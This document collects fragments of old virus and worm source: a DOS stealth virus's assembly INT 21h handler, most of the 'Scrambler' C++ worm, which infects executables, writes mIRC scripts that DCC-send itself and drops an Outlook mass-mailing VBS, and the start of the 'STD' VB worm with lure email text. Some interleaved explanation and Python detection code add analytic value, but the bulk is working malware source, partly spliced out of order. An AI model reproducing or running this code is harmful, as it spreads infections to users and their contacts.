cmp ax, 4B00h ; run_prog ?
jne short loc_12A9
db 0ebh
run_jmp db offset loc_12a7 - ($ + 1)
push ax
push bx
push ds ; push regz
push es
mov ah, 52h ; gimme list_of_listz
call int_21h
mov ax, es:[bx-2] ; gimme first_mcb
loc_127B:
mov ds, ax
add ax, ds:[3] ; go2 next mcb_block
inc ax
cmp byte ptr ds:[0], 5Ah ; last_one ?
jne loc_127B
mov bx, cs ; yope
cmp ax, bx ; it'z our mcb_block ?
jne short loc_129D
mov byte ptr ds:[0], 4Dh ; make middle_block
xor ax, ax
mov ds, ax
add word ptr ds:[413h], 4 ; add 4K 2 mem which we took
loc_129D:
mov byte ptr cs:[run_jmp-p], offset loc_12a7 - (run_jmp + 1)
pop es ; now jump 2 loc_12a7
pop ds
pop bx ; restore regz
pop ax
loc_12A7:
jmp short loc_12FD
loc_12A9:
cmp ah, 3Dh ; open_file ?
je short loc_12FD
cmp ah, 56h ; rename_file ?
je short loc_12FD
cmp ax, 6C00h ; extended open/create ?
jne short loc_12C1
test dl, 00010010b ; action 02h (truncate) or 10h (create) ?
mov dx, si ; file name is in ds:si for this call
jz short loc_12FD ; plain open -> infect now
jmp short loc_1307 ; yope, file gets created -> infect on close
loc_12C1:
cmp ah, 3Ch ; create_file ?
je short loc_1307
cmp ah, 5Bh ; create_new_file ?
je short loc_1307
cmp ah, 3Eh ; close_file ?
jne short loc_12F6
cmp bx, word ptr cs:[ext_handle - p]; do we have
jne short loc_12F6 ; something 2 infect ?
or bx, bx ; handle is null ?
jz short loc_12F6
call int_21h ; close it
jc short loc_1323
push ds
push cs
pop ds
mov dx, offset ext_file_name - p; gimme file_name
call sub_118F ; and infect it
mov word ptr ds:[ext_handle - p], 0; nulluj ext_handle
pop ds
loc_12F0:
pop dx
popf
clc ; clear error_flag
retf 2 ; and end ...
loc_12F6:
pop dx
popf ; jmp 2 old_int_21h
jmp dword ptr cs:[old_int_21h - p__]
loc_12FD:
call sub_1098 ; check 4 file_name & disk
jc loc_12F6 ; error ?
call sub_118F ; infect it
jmp short loc_12F6
loc_1307:
cmp word ptr cs:[ext_handle - p], 0
jne loc_12F6 ; a created file already pending ?
call sub_1098 ; check 4 file_name & disk
jc loc_12F6 ; error ?
mov word ptr cs:[file_offset - p], dx; store file_name_
pop dx ; _offset
push dx
call int_21h ; do the create (original call)
db 0bah ; mov dx, ?
file_offset dw 45cch
jnc short loc_1329 ; error ?
loc_1323: ; yope
pop dx
popf
stc ; set error_flag
retf 2 ; and end ...
loc_1329:
push cx
push si
push di ; ok
push es ; move file_name
xchg si, dx ; 2 our buffer
mov di, offset ext_handle - p
push cs
pop es
stosw ; and store handle of course
mov cx, 4Bh ; move 4bh bytez
rep movsb ; and finally move
pop es
pop di
pop si ; restore regz
pop cx
jmp short loc_12F0 ; and end ...
;
db 'Did you leave the room ?'
;
run_counter dw 04FBh
buffer db 160h dup(?)
three_bytez db ? ; offset 14bah
; instr_buffer - 3
; 0e9h disp16 haz 3 bytez ...
handle dw ? ; offset 14bbh
instr_buffer db 10 dup(?) ; offset 14bdh
file_buffer db 1ah dup(?) ; offset 14c7h
old_int_24h dd ? ; offset 14e1h
file_time_date dd ? ; offset 14e5h
ext_handle dw ? ; offset 14e9h
ext_file_name db 4bh dup(?) ; offset 14ebh
name_buffer db 4bh dup(?) ; offset 1536h
;
seg_a ends
end start
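The new_int_21h handler above implements directory stealth. It lets the real FindFirst/FindNext (AH=4Eh/4Fh) or the FCB find (AH=11h/12h) run, then positions BX on the time field of the record left in the DTA (offset 16h for the handle-based record; 17h for the FCB record, after skipping the 7-byte extended-FCB prefix when the first byte is FFh), calls sub_1157 on it to test the infection marker (sub_1157 is not in this excerpt), and if the entry is infected subtracts the virus length from the 32-bit size field four (resp. six) bytes further on, so DIR shows the original host size. The usual check for this class of stealth is to compare the size DIR reports with the size obtained by seeking to the end of an opened handle, or to boot from a clean disk. The Python below is an added illustration of the two record layouts and of the size patch; it is not part of Ratter's listing. The virus length 3544 and the infected flag are assumptions, since neither the length nor the marker test appears in this part of the page.

```python
import struct

# Assumed virus length for the demo; the listing's sub_1178 subtracts the real
# value, which is not given in this part of the page.
VIRUS_SIZE = 3544

def build_find_dta(name, size, time=0x5138, date=0x289B, attr=0x20):
    """Construct the 43-byte record INT 21h AH=4Eh/4Fh leave in the DTA:
    00h-14h reserved for DOS, 15h attribute, 16h time, 18h date,
    1Ah 32-bit size, 1Eh ASCIZ name (constructed sample data)."""
    dta = bytearray(43)
    dta[0x15] = attr
    struct.pack_into("<HHI", dta, 0x16, time, date, size)
    dta[0x1E:0x1E + len(name)] = name.encode("ascii")
    return dta

def build_fcb_find_dta(name, ext, size, time=0x5138, date=0x289B, extended=False):
    """Construct what AH=11h/12h leave in the DTA: a drive byte followed by the
    raw 32-byte directory entry (name 00h, attr 0Bh, time 16h, date 18h,
    cluster 1Ah, size 1Ch), optionally preceded by the 7-byte extended-FCB
    prefix (FFh, five reserved bytes, attribute byte)."""
    prefix = b"\xFF" + b"\0" * 5 + b"\x20" if extended else b""
    entry = bytearray(32)
    entry[0:11] = f"{name:<8}{ext:<3}".encode("ascii")
    entry[0x0B] = 0x20
    struct.pack_into("<HHHI", entry, 0x16, time, date, 2, size)
    return bytearray(prefix + b"\x03" + bytes(entry))   # drive 3 = C:

def time_offset(dta, fcb):
    """Where the hook points BX before calling its marker test (sub_1157)."""
    if fcb:
        return (7 if dta[0] == 0xFF else 0) + 0x17   # skip ext_FCB, then drive byte + 16h
    return 0x16

def size_offset(dta, fcb):
    """Offset of the 32-bit size field, reached the way the hook reaches it."""
    return time_offset(dta, fcb) + (6 if fcb else 4)

def read_size(dta, fcb):
    return struct.unpack_from("<I", dta, size_offset(dta, fcb))[0]

def stealth_hook(dta, fcb, infected, virus_size=VIRUS_SIZE):
    """Post-process a find record the way new_int_21h does after the real DOS
    call returns: for an entry the marker test reports as infected, subtract
    the virus length from the size field so DIR shows the host's original
    size. The marker test itself is not on this page, so it is a parameter."""
    out = bytearray(dta)
    if infected:
        off = size_offset(out, fcb)
        (size,) = struct.unpack_from("<I", out, off)
        struct.pack_into("<I", out, off, size - virus_size)
    return out

if __name__ == "__main__":
    rec = build_find_dta("HOST.EXE", 10000)
    print(read_size(rec, False), read_size(stealth_hook(rec, False, True), False))
```

The two layouts explain the otherwise odd-looking `add bx, 17h` / `add bx, 6` versus `add bx, 16h` / `add bx, 4` pairs in the listing: the FCB find returns a drive byte plus the raw directory entry, while the handle-based find returns DOS's own 43-byte record.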
/*
Virus Name: Scrambler
Version: B
Type: Win32 EXE Prepender / I-Worm
Author: Gigabyte
Homepage: http://gigabyte.coderz.net
*/
#include <iostream>
#include <windows.h>
#include <direct.h>
#include <time.h>
strcpy(checksum, Buffer);
strcat(checksum, Buffer);
}
fclose(SRC);
}
while(! feof(SRC))
{
Counter = fread(Buffer, 1, 1024, SRC);
if(Counter)
fwrite(Buffer, 1, Counter, DST);
}
}
}
fclose(SRC);
fclose(DST);
}
bool FileExists(char *FileName)
{
HANDLE Exists;
Exists = CreateFile(FileName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, 0,
OPEN_EXISTING, 0, 0);
if(Exists == INVALID_HANDLE_VALUE)
return false;
CloseHandle(Exists);
return true;
}
strcpy(mp3, FolderSearch);
strcat(mp3, "\\");
strcat(mp3, FindData.cFileName );
strcpy(mp3copy, "mp3.tmp");
CopyFile(mp3, mp3copy, FALSE);
Scramble(mp3copy,mp3);
_unlink(mp3copy);
}
}
while (FindNextFile(FoundFile, &FindData));
FindClose(FoundFile);
}
}
void ScriptFile()
{
GetWindowsDirectory(Buffer,MAX_PATH);
fprintf(scrambler,"[script]\nn0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }\nn1=/dcc send $nick");
fprintf(scrambler," %s%csystem%c%s\nn2=}\n", Buffer, 92, 92, CopyName);
}
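ScriptFile() writes a script.ini whose ON JOIN handler DCC-sends the worm copy from the Windows system directory to every user who joins a channel, skipping the infected user itself with `$nick == $me`. A responder checking a mIRC install wants to flag exactly that pattern rather than grep for a file name. The Python below is an added example, not code from Scrambler: it reads the `[script]` section, reassembles each `on ...:EVENT:` handler until its braces balance, and reports handlers that contain a `dcc send`. CopyName is assumed to be `scram.exe` in the constructed sample, because its value is not shown in this excerpt; the benign second sample is also constructed.

```python
import re

# Constructed sample: the [script] section ScriptFile() writes, with CopyName
# assumed to be "scram.exe" (the real value is set elsewhere in the source).
DROPPED_SCRIPT_INI = """[script]
n0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }
n1=/dcc send $nick C:\\WINDOWS\\system\\scram.exe
n2=}
"""

# Constructed benign script for comparison: greets joiners, no file transfer.
BENIGN_SCRIPT_INI = """[script]
n0=on 1:JOIN:#:{ /msg $chan Welcome $nick }
n1=on 1:TEXT:!version*:#:{ /msg $chan running mIRC $version }
"""

EVENT_RE = re.compile(r"^\s*/?on\s+[^:]+:(?P<event>[A-Za-z]+):(?P<rest>.*)$", re.I)
DCC_RE = re.compile(r"\bdcc\s+send\s+(?P<target>\S+)\s+(?P<file>\S+)", re.I)

def script_lines(ini_text):
    """Return the script lines of the [script] section in n0, n1, ... order."""
    lines = []
    in_script = False
    for raw in ini_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_script = line.lower() == "[script]"
            continue
        m = re.match(r"n(\d+)=(.*)", line)
        if in_script and m:
            lines.append((int(m.group(1)), m.group(2)))
    return [body for _, body in sorted(lines)]

def find_auto_dcc_handlers(ini_text):
    """Flag event handlers that DCC-send a file to the user who triggered them."""
    findings = []
    lines = script_lines(ini_text)
    i = 0
    while i < len(lines):
        m = EVENT_RE.match(lines[i])
        if not m:
            i += 1
            continue
        # Collect the handler body from the 'on' line until braces balance.
        depth = 0
        body = []
        while i < len(lines):
            body.append(lines[i])
            depth += lines[i].count("{") - lines[i].count("}")
            i += 1
            if depth <= 0:
                break
        text = " ".join(body)
        for d in DCC_RE.finditer(text):
            findings.append({
                "event": m.group("event").upper(),
                "target": d.group("target"),
                "file": d.group("file"),
                # the worm's own self-exclusion test is itself a useful indicator
                "self_excluded": bool(re.search(r"\$nick\s*==\s*\$me", text)),
            })
    return findings

if __name__ == "__main__":
    for hit in find_auto_dcc_handlers(DROPPED_SCRIPT_INI):
        print(hit)
```

Run it against every `script.ini` under the mIRC install directories the source targets (`mirc\` and `PROGRA~1\mirc\` on C: through F:); a JOIN handler that sends `$nick` an executable is not something a legitimate script does.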
strcpy(Virus, argv[0]);
GetWindowsDirectory(Buffer,MAX_PATH);
strcpy(FullPath, Buffer);
strcat(FullPath, "\\system\\");
strcat(FullPath, CopyName);
WriteVirus(Virus, FullPath);
WIN32_FIND_DATA FindData;
HANDLE FoundFile;
strcat(DirToInfect, Buffer);
strcat(DirToInfect, "\\*.exe");
FoundFile = FindFirstFile(DirToInfect, &FindData);
if(FoundFile != INVALID_HANDLE_VALUE)
{
do
{
if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
}
else
{
GetWindowsDirectory(Buffer,MAX_PATH);
_chdir(Buffer);
_chdir("system");
strcpy(hostfile, Buffer);
strcat(hostfile, "\\");
strcat(hostfile, FindData.cFileName);
VirCheck(hostfile);
strcpy(gbmark,"gb");
if(FindData.cFileName[3] != 'D')
{
if(FindData.cFileName[0] != 'P')
{
if(FindData.cFileName[0] != 'R')
{
if(FindData.cFileName[0] != 'E')
{
if(FindData.cFileName[0] != 'T')
{
if(FindData.cFileName[0] != 'W')
{
if(FindData.cFileName[0] != 'w')
{
if(FindData.cFileName[5] != 'R')
{
if(checksum[1] != gbmark[1])
{
strcpy(CopyHost, "host.tmp");
CopyFile(hostfile, CopyHost, FALSE);
strcpy(Virus, argv[0]);
CopyFile(FullPath, hostfile, FALSE);
AddOrig(CopyHost, hostfile);
_unlink("host.tmp");
}}}}}}}}}
}
}
while (FindNextFile(FoundFile, &FindData));
FindClose(FoundFile);
}
if(FileExists("c:\\mirc\\mirc32.exe"))
{
FoundFile = FindFirstFile("c:\\mirc\\download\\*.exe", &FindData);
if(FoundFile != INVALID_HANDLE_VALUE)
{
do
{
if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
}
else
{
_chdir(Buffer);
_chdir("system");
strcpy(hostfile, "c:\\mirc\\download\\");
strcat(hostfile, FindData.cFileName );
VirCheck(hostfile);
strcpy(gbmark,"gb");
if(checksum[1] != gbmark[1])
{
strcpy(CopyHost, "host.tmp");
CopyFile(hostfile, CopyHost, FALSE);
WriteVirus(Virus, hostfile);
AddOrig(CopyHost, hostfile);
_unlink("host.tmp");
}
}
}
while (FindNextFile(FoundFile, &FindData));
FindClose(FoundFile);
}
}
scrambler = fopen("c:\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}
scrambler = fopen("c:\\PROGRA~1\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}
scrambler = fopen("d:\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}
scrambler = fopen("d:\\PROGRA~1\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}
scrambler = fopen("e:\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}
scrambler = fopen("e:\\PROGRA~1\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}
scrambler = fopen("f:\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}
scrambler = fopen("f:\\PROGRA~1\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}
strcpy(RepairHost, Buffer);
strcat(RepairHost, "\\system\\hostfile.exe");
CopyOrig(Virus, RepairHost);
strcpy(ScramFile, Buffer);
strcat(ScramFile, "\\system\\scram.sys");
if(FileExists(ScramFile) == false)
HDDSearch("c:");
strcpy(WinScript, Buffer);
strcat(WinScript, "\\wscript.exe");
if(FileExists(WinScript))
{
if(FileExists("scram.sys") == false)
{
scrambler = fopen("scrambler.vbs","wt");
if(scrambler)
{
fprintf(scrambler,"On Error Resume Next\n");
fprintf(scrambler,"Dim scrambler, Mail, Counter, A, B, C, D, E, F\n");
fprintf(scrambler,"Set scrambler = CreateObject(%coutlook.application%c)\n",
34, 34);
fprintf(scrambler,"Set Mail = scrambler.GetNameSpace(%cMAPI%c)\n", 34, 34);
fprintf(scrambler,"For A = 1 To Mail.AddressLists.Count\n");
fprintf(scrambler,"Set B = Mail.AddressLists(A)\n");
fprintf(scrambler,"Counter = 1\n");
fprintf(scrambler,"Set C = scrambler.CreateItem(0)\n");
fprintf(scrambler,"For D = 1 To B.AddressEntries.Count\n");
fprintf(scrambler,"E = B.AddressEntries(Counter)\n");
fprintf(scrambler,"C.Recipients.Add E\n");
fprintf(scrambler,"Counter = Counter + 1\n");
fprintf(scrambler,"If Counter > 90 Then Exit For\n");
fprintf(scrambler,"Next\n");
fprintf(scrambler,"C.Subject = %cCheck this out, it's funny!%c\n", 34, 34);
fprintf(scrambler,"C.Attachments.Add %c%s%csystem%c%s%c\n", 34, Buffer, 92,
92, CopyName, 34);
fprintf(scrambler,"C.DeleteAfterSubmit = True\n");
fprintf(scrambler,"C.Send\n");
fprintf(scrambler,"E = %c%c\n", 34, 34);
fprintf(scrambler,"Next\n");
fprintf(scrambler,"Set F = CreateObject(%cScripting.FileSystemObject%c)\n",
34, 34);
fprintf(scrambler,"F.DeleteFile Wscript.ScriptFullName\n");
fclose(scrambler);
}
ShellExecute(NULL, "open", "scrambler.vbs", NULL, NULL, SW_SHOWNORMAL);
}
}
_chdir(Buffer);
scrambler = fopen("winstart.bat", "wt");
if(scrambler)
{
fprintf(scrambler,"@cls\n");
fprintf(scrambler,"@echo Today..\n");
fprintf(scrambler,"@echo I'm going to scramble your mind..\n");
fclose(scrambler); /* close inside the if: the original called fclose on a NULL handle when fopen failed */
}
_chdir("system");
if(FileExists(RepairHost))
WinExec(RepairHost, SW_SHOWNORMAL);
_unlink("hostfile.exe");
}
Attribute VB_Name = "STD"
'STD v1.0 by Error of Team Necrosis
' Commented by Error, pardon my commenting style
' ********W32.HLLP.STD.worm Source*********
' STD is a Memory-Resident EXE prepender with
' Worm functions for Outlook and mIRC
Public myDNA, myRNA, MyCode, STD, Grime, MySTD As String
Public FDateTime, oldDate, FDate, OldTime, FTime As String
Const MySize = 17920
Const RSP_SIMPLE_SERVICE = 1
Const RSP_UNREGISTER_SERVICE = 0
Private iResult, hProg, idprog, iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Const Notification = "Hey, sorry I haven't written to you in a while. " & _
"Well you could call it a while. I'm writing this E-mail " & _
"to let you know of an attachment im sending with the next mail."
Const Notify = "Here is the e-mail attachment I told you about earlier, " & _
"It's an installation program for "
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long, _
    ByVal dwType As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, _
    ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, _
    lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Sub Form_Load()
' I put STD into a form because if you compile
' it into a module you wont be able to chose
' what default icon STD will have, and it ends
' up with a nasty baby blue and white form.
' Which is very noticable since STD's icon
' becomes the infected EXE's icon. i then made
' the MS-DOS Program Icon as the default icon
Sub CreatePKunzip()
Open "c:\windows\pkunzip.dbg" For Output As #2
Print #2, "N PKUNZIP.COM"
Print #2, "E 0100 B9 2E B9 BF BE 0B 2B CF 32 C0 F3 AA B4 30 CD 21"
Print #2, "E 0110 A3 22 B9 8D A5 00 06 89 26 26 B9 B8 C6 09 E8 50"
Print #2, "E 0120 00 E8 C0 01 B8 4B 0A E8 31 00 B8 62 A9 E8 2B 00"
Print #2, "E 0130 E8 61 00 E8 3E 00 A0 20 B9 E9 0E 00 BB 65 0A 50"
Print #2, "E 0140 53 92 E8 34 00 58 E8 28 00 58 B4 4C CD 21 C6 06"
Print #2, "E 0150 20 B9 01 50 B8 5B 0A E8 1F 00 58 E8 88 02 8B F0"
Print #2, "E 0160 E8 23 00 8B 1E BC 0B 8B D6 91 B4 40 CD 21 E9 82"
Print #2, "E 0170 02 E8 E7 FF B8 48 0A EB E2 50 E8 F7 FF B8 3E 0A"
Print #2, "E 0180 E8 D8 FF 58 EB D5 56 96 BA FF FF AC 42 84 C0 75"
Print #2, "E 0190 FA 92 5E C3 E8 4F 02 33 C9 33 D2 88 0E 2A AA 8B"
Print #2, "E 01A0 1E 28 B9 B8 02 42 CD 21 8B F0 85 D2 75 05 3D 00"
Print #2, "E 01B0 10 72 03 BE 00 10 2B C6 83 DA 00 95 8B FA 83 EE"
Print #2, "E 01C0 12 8B D5 8B CF E8 EF 00 BA 00 0E 8D 4C 12 E8 EC"
Print #2, "E 01D0 00 8B CE C7 06 68 0A 05 06 B8 66 0A E8 A3 00 85"
Print #2, "E 01E0 C0 75 1F 8B C5 0B C7 74 11 81 ED EA 0F 83 DF 00"
Print #2, "E 01F0 7D CF 03 F5 33 ED 33 FF EB C7 B0 03 BA 6A 0A E9"
Print #2, "E 0200 3A FF 97 8B 4D 14 E3 31 56 8D 75 16 33 DB AC 3C"
Print #2, "E 0210 1B 74 0C 3C 13 75 03 43 EB 05 92 B4 02 CD 21 E2"
Print #2, "E 0220 ED 5E E8 4F FF 85 DB 74 10 B8 86 0A E8 99 00 72"
Print #2, "E 0230 05 B0 08 E9 14 FF E8 3B FF 8B 36 26 B9 8B 55 10"
Print #2, "E 0240 8B 4D 12 E8 71 00 83 7D 0E 00 75 2E 8B 4D 0C A1"
Print #2, "E 0250 06 00 2B C6 3B C1 72 22 8B D6 E8 60 00 8B 4D 0A"
Print #2, "E 0260 E3 15 8B 5C 1C 8B 54 1E 8D 78 2E 03 FA 03 7C 20"
Print #2, "E 0270 E8 B2 01 8B F7 E2 EB E9 79 01 B0 07 BA B5 0A E9"
Print #2, "E 0280 BA FE E8 61 01 96 33 C0 A3 D6 AE E3 24 8B FA AD"
Print #2, "E 0290 47 4F AF E0 FC 83 F9 01 76 17 A7 74 06 4F 4F 4E"
Print #2, "E 02A0 4E EB EE 8D 5D FC 89 1E D6 AE 80 3E 2A AA 00 74"
Print #2, "E 02B0 EC A1 D6 AE E9 3C 01 53 B8 00 42 EB 03 53 B4 3F"
Print #2, "E 02C0 8B 1E 28 B9 CD 21 5B C3 E8 90 FE B8 08 0C CD 21"
Print #2, "E 02D0 24 DF 3C 59 74 04 3C 4E 75 F1 92 B4 02 CD 21 80"
Print #2, "E 02E0 EA 4F F5 C3 E8 D5 00 BE 81 00 8A 4C FF 32 ED E3"
Print #2, "E 02F0 1E AC 3C 20 74 17 3C 09 74 13 3C 2D 75 6D AC 49"
Print #2, "E 0300 74 0D 3C 6F 74 04 3C 4F 75 03 A2 FC A9 E2 E2 80"
Print #2, "E 0310 3E 24 B9 00 74 34 BE 62 A9 33 DB AC 3C 2E 75 01"
Print #2, "E 0320 43 84 C0 75 F6 85 DB 75 0A C7 44 FF 2E 5A C7 44"
Print #2, "E 0330 01 49 50 BA 62 A9 B8 00 3D 80 3E 22 B9 03 72 02"
Print #2, "E 0340 B0 20 CD 21 A3 28 B9 72 09 C3 BA D1 0A B0 02 E9"
Print #2, "E 0350 EA FD BA C4 0A BB 62 A9 B0 02 E9 E2 FD AC 3C 20"
Print #2, "E 0360 74 90 3C 09 74 8C AA E2 F4 EB A4 80 3E 24 B9 00"
Print #2, "E 0370 75 08 BF 62 A9 A2 24 B9 EB 03 BF E0 AE AA EB E7"
Print #2, "E 0380 E8 63 00 8B F2 8B E9 8B 0E 2A B9 8B 16 2C B9 BF"
Print #2, "E 0390 BC AA FC 33 C0 45 EB 16 AC 8B D8 32 D9 8A CD 8A"
Print #2, "E 03A0 EA 8A D6 8A F7 D1 E3 D1 E3 33 09 33 51 02 4D 75"
Print #2, "E 03B0 E7 89 0E 2A B9 89 16 2C B9 E9 37 00 E8 27 00 FD"
Print #2, "E 03C0 BF BA AE BD FF 00 B9 08 00 8B D5 33 C0 D1 E8 D1"
Print #2, "E 03D0 DA 73 07 81 F2 20 83 35 B8 ED E2 F1 AB 92 AB 4D"
Print #2, "E 03E0 79 E4 FC E9 0D 00 8F 06 D2 AE 55 56 57 53 51 FF"
Print #2, "E 03F0 26 D2 AE 59 5B 5F 5E 5D C3 50 56 57 97 8B F2 AC"
Print #2, "E 0400 AA 84 C0 75 FA 5F 5E 58 C3 52 56 8B F0 E8 76 FD"
Print #2, "E 0410 03 C6 5E 5A EB E3 B8 05 0B E8 32 FD B8 7C AA E8"
Print #2, "E 0420 39 FD E9 CE FF E8 BE FF E8 E3 00 8A 44 0A 3C 08"
Print #2, "E 0430 74 04 84 C0 75 E0 03 D3 83 C2 1E 33 C9 03 54 2A"
Print #2, "E 0440 13 4C 2C E8 71 FE E8 54 00 85 C0 74 4D E8 24 FD"
Print #2, "E 0450 B8 FF FF A3 2A B9 A3 2C B9 8B 44 0A 48 78 05 E8"
Print #2, "E 0460 FB 00 EB 03 E8 BA 00 A1 2A B9 8B 16 2C B9 F7 D0"
Print #2, "E 0470 F7 D2 2B 44 10 1B 54 12 0B C2 74 0B B8 52 0B E8"
Print #2, "E 0480 CC FC C6 06 20 B9 01 8B 1E D0 AE 8B 4C 0C 8B 54"
Print #2, "E 0490 0E B8 01 57 CD 21 B4 3E CD 21 E9 56 FF E8 46 FF"
Print #2, "E 04A0 BF 7C AA 8B CB 03 FB 4F FD B0 2F F2 AE 75 01 47"
Print #2, "E 04B0 47 FC B8 2C AA BA E0 AE E8 3E FF 50 8B D7 E8 48"
Print #2, "E 04C0 FF 58 80 3E FC A9 00 75 29 50 BA FE A9 B4 1A CD"
Print #2, "E 04D0 21 5A B4 4E B9 07 00 CD 21 72 17 B8 00 43 CD 21"
Print #2, "E 04E0 72 10 92 E8 68 FC B8 26 0B E8 DC FD 72 04 33 C0"
Print #2, "E 04F0 EB 19 B9 20 00 B4 3C BA 2C AA CD 21 73 0A 8B DA"
Print #2, "E 0500 BA 43 0B B0 05 E9 37 FC A3 D0 AE E9 E5 FE E8 D5"
Print #2, "E 0510 FE BF 7C AA 8D 74 2E 8B CB F3 A4 32 C0 AA E9 D2"
Print #2, "E 0520 FE E8 C2 FE B8 67 0B E8 31 FC B8 2C AA E8 2B FC"
Print #2, "E 0530 B9 62 9B 8B 7C 14 8B 74 16 85 F6 75 06 3B CF 72"
Print #2, "E 0540 02 8B CF BA 00 0E 52 E8 73 FD 5A 85 C0 74 0B 2B"
Print #2, "E 0550 F8 83 DE 00 91 E8 47 04 EB DF E9 96 FE E8 86 FE"
Print #2, "E 0560 B8 74 0B E8 F5 FB B8 2C AA E8 EF FB E8 30 00 E9"
Print #2, "E 0570 81 FE 80 FD 08 74 05 8A CD E8 F4 00 8B CA AD 33"
Print #2, "E 0580 C2 40 74 03 E9 C3 02 A4 81 FF 00 9E 72 03 E8 F9"
Print #2, "E 0590 03 81 FE 20 B7 72 03 E8 C4 00 E2 EB 58 EB 0B C6"
Print #2, "E 05A0 06 DE AE 00 E8 B7 00 BF 00 0E B5 08 AD 92 80 3E"
Print #2, "E 05B0 DE AE 00 75 57 E8 8E 00 D0 16 DE AE E8 95 01 E8"
Print #2, "E 05C0 C2 00 84 E4 75 0C AA 81 FF 00 9E 72 F2 E8 BA 03"
Print #2, "E 05D0 EB ED 3D 00 01 74 D7 2D FE 00 50 E8 0D 01 91 59"
Print #2, "E 05E0 56 8D 75 FF 2B F3 72 06 81 FE 00 0E 73 18 BB 00"
Print #2, "E 05F0 0E 2B DE 03 36 DC AE 3B D9 73 0B 87 D9 2B D9 F3"
Print #2, "E 0600 A4 BE 00 0E 87 D9 F3 A4 5E 91 EB BB 8B CF BA 00"
Print #2, "E 0610 0E 2B CA E8 89 03 C3 80 F9 08 77 12 53 33 C0 33"
Print #2, "E 0620 DB 8A D9 8A 87 A8 0B 22 C2 E8 44 00 5B C3 53 33"
Print #2, "E 0630 DB 8A D9 B1 08 2A D9 E8 E2 FF 8A CB 8A D8 E8 DB"
Print #2, "E 0640 FF 0A F8 93 5B C3 D1 EA FE CD 74 01 C3 9C 81 FE"
Print #2, "E 0650 20 B7 72 03 E8 07 00 8A 34 46 B5 08 9D C3 50 51"
Print #2, "E 0660 52 B9 00 08 BA 20 AF 8B F2 E8 51 FC 5A 59 58 C3"
Print #2, "E 0670 2A E9 77 0D F6 DD 2A CD D3 EA 8A CD E8 CE FF 2A"
Print #2, "E 0680 E9 D3 EA C3 8A DA 32 FF D1 E3 8B 9F 62 A0 85 DB"
Print #2, "E 0690 78 0E 8A 8F 02 9F E8 D7 FF 93 3D 09 01 73 09 C3"
Print #2, "E 06A0 B8 62 A4 E8 26 00 EB EE 3D 1D 01 74 1B 2D 01 01"
Print #2, "E 06B0 8A C8 D0 E9 D0 E9 49 25 03 00 04 04 D3 E0 05 01"
Print #2, "E 06C0 01 93 E8 52 FF 03 C3 C3 B8 00 02 C3 B1 08 E8 9F"
Print #2, "E 06D0 FF 56 96 8A C2 32 C9 F7 D3 FE C1 D1 EB D1 E8 D1"
Print #2, "E 06E0 D3 D1 E3 8B 18 85 DB 78 EE 5E C3 8A DA 32 FF D1"
Print #2, "E 06F0 E3 8B 9F 62 A2 85 DB 78 1F 8A 8F 42 A0 E8 70 FF"
Print #2, "E 0700 80 FB 04 72 12 93 8A C8 D0 E9 49 24 01 04 02 D3"
Print #2, "E 0710 E0 93 E8 02 FF 03 D8 C3 B8 E2 A8 E8 AE FF EB DD"
Print #2, "E 0720 56 51 BF 02 9F B9 90 00 B0 08 F3 AA B1 70 FE C0"
Print #2, "E 0730 F3 AA B1 18 B0 07 F3 AA B1 08 FE C0 F3 AA BF 42"
Print #2, "E 0740 A0 B1 20 89 0E FA A9 B0 05 F3 AA C7 06 D4 AE 20"
Print #2, "E 0750 01 E9 D4 00 B1 02 E8 BE FE 48 79 03 E9 13 FE 57"
Print #2, "E 0760 74 BE 48 74 03 E9 E2 00 B1 05 E8 AA FE 05 01 01"
Print #2, "E 0770 A3 D4 AE B1 05 E8 9F FE 40 A3 FA A9 51 BF BC AE"
Print #2, "E 0780 B9 13 00 32 C0 F3 AA 59 B1 04 E8 8A FE 05 04 00"
Print #2, "E 0790 BF 96 0B 8B EF 03 E8 33 DB B1 03 E8 79 FE 8A 1D"
Print #2, "E 07A0 88 87 BC AE 47 3B FD 72 F0 56 51 BF 20 B7 BE BC"
Print #2, "E 07B0 AE B8 13 00 E8 9B 00 59 5E 8B 2E D4 AE 03 2E FA"
Print #2, "E 07C0 A9 BF 02 9F 32 FF 8A DA D1 E3 8B 9F 20 B7 8A 8F"
Print #2, "E 07D0 BC AE E8 9B FE 8A C3 3C 10 73 06 AA 4D 75 E5 EB"
Print #2, "E 07E0 35 77 0C B1 02 E8 2F FE 04 03 8A 4D FF EB 17 3C"
Print #2, "E 07F0 11 77 09 B1 03 E8 1F FE 04 03 EB 08 B1 07 E8 16"
Print #2, "E 0800 FE 05 0B 00 32 C9 51 86 C1 32 ED 2B E9 72 3B F3"
Print #2, "E 0810 AA 59 85 ED 75 AE 56 51 BE 02 9F BF 42 A0 03 36"
Print #2, "E 0820 D4 AE 8B 0E FA A9 F3 A4 A1 D4 AE BE 02 9F BF 62"
Print #2, "E 0830 A0 BD 62 A4 E8 1B 00 A1 FA A9 BE 42 A0 BF 62 A2"
